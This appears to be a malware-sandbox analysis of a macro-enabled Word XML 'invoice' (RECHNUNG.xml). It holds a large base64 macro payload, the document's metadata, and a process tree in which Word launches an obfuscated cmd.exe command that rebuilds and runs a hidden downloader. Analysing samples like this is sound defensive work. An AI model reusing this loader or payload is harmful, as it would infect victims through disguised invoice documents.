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 AAAL8AQAAAASNFZ4 |
WordDocumentDocSuppDataBinDataName: | editdata.mso |
WordDocumentStylesStyleRPrRFontsCs: | Tahoma |
WordDocumentStylesStyleRPrRFontsH-ansi: | Tahoma |
WordDocumentStylesStyleRPrRFontsAscii: | Tahoma |
WordDocumentStylesStyleRsidVal: | 005A24B1 |
WordDocumentStylesStyleLinkVal: | BalloonTextChar |
WordDocumentStylesStyleBasedOnVal: | Normal |
WordDocumentStylesStyleTblPrTblCellMarRightType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarRightW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarBottomType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarBottomW: | - |
WordDocumentStylesStyleTblPrTblCellMarLeftType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarLeftW: | 108 |
WordDocumentStylesStyleTblPrTblCellMarTopType: | dxa |
WordDocumentStylesStyleTblPrTblCellMarTopW: | - |
WordDocumentStylesStyleTblPrTblIndType: | dxa |
WordDocumentStylesStyleTblPrTblIndW: | - |
WordDocumentStylesStyleUiNameVal: | Table Normal |
WordDocumentStylesStyleRPrLangBidi: | AR-SA |
WordDocumentStylesStyleRPrLangFareast: | EN-US |
WordDocumentStylesStyleRPrLangVal: | EN-US |
WordDocumentStylesStyleRPrSz-csVal: | 22 |
WordDocumentStylesStyleRPrSzVal: | 22 |
WordDocumentStylesStyleRPrFontVal: | Calibri |
WordDocumentStylesStylePPrSpacingLine-rule: | auto |
WordDocumentStylesStylePPrSpacingLine: | 259 |
WordDocumentStylesStylePPrSpacingAfter: | 160 |
WordDocumentStylesStyleNameVal: | Normal |
WordDocumentStylesStyleStyleId: | Normal |
WordDocumentStylesStyleDefault: | on |
WordDocumentStylesStyleType: | paragraph |
WordDocumentStylesLatentStylesLsdExceptionName: | Normal |
WordDocumentStylesLatentStylesLatentStyleCount: | 375 |
WordDocumentStylesLatentStylesDefLockedState: | off |
WordDocumentStylesVersionOfBuiltInStylenamesVal: | 7 |
WordDocumentFontsFontSigCsb-1: | 00000000 |
WordDocumentFontsFontSigCsb-0: | 000001FF |
WordDocumentFontsFontSigUsb-3: | 00000000 |
WordDocumentFontsFontSigUsb-2: | 00000009 |
WordDocumentFontsFontSigUsb-1: | C0007841 |
WordDocumentFontsFontSigUsb-0: | E0002AFF |
WordDocumentFontsFontPitchVal: | variable |
WordDocumentFontsFontFamilyVal: | Roman |
WordDocumentFontsFontCharsetVal: | 00 |
WordDocumentFontsFontPanose-1Val: | 02020603050405020304 |
WordDocumentFontsFontName: | Times New Roman |
WordDocumentFontsDefaultFontsCs: | Times New Roman |
WordDocumentFontsDefaultFontsH-ansi: | Calibri |
WordDocumentFontsDefaultFontsFareast: | Calibri |
WordDocumentFontsDefaultFontsAscii: | Calibri |
WordDocumentDocumentPropertiesVersion: | 16 |
WordDocumentDocumentPropertiesCharactersWithSpaces: | 1 |
WordDocumentDocumentPropertiesParagraphs: | 1 |
WordDocumentDocumentPropertiesLines: | 1 |
WordDocumentDocumentPropertiesCharacters: | 1 |
WordDocumentDocumentPropertiesWords: | - |
WordDocumentDocumentPropertiesPages: | 1 |
WordDocumentDocumentPropertiesLastSaved: | 2019:01:22 10:46:00Z |
WordDocumentDocumentPropertiesCreated: | 2019:01:22 10:46:00Z |
WordDocumentDocumentPropertiesTotalTime: | - |
WordDocumentDocumentPropertiesRevision: | 1 |
WordDocumentIgnoreSubtreeVal: | http://schemas.microsoft.com/office/word/2003/wordml/sp2 |
WordDocumentOcxPresent: | no |
WordDocumentEmbeddedObjPresent: | no |
WordDocumentMacrosPresent: | yes |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3428 | "C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\Desktop\RECHNUNG.xml" | C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: XML Editor Exit code: 3221225547 Version: 14.0.4750.1000 | ||||
2356 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RECHNUNG.xml" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | MSOXMLED.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2900 | c:\i8072\a1011\i6001\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
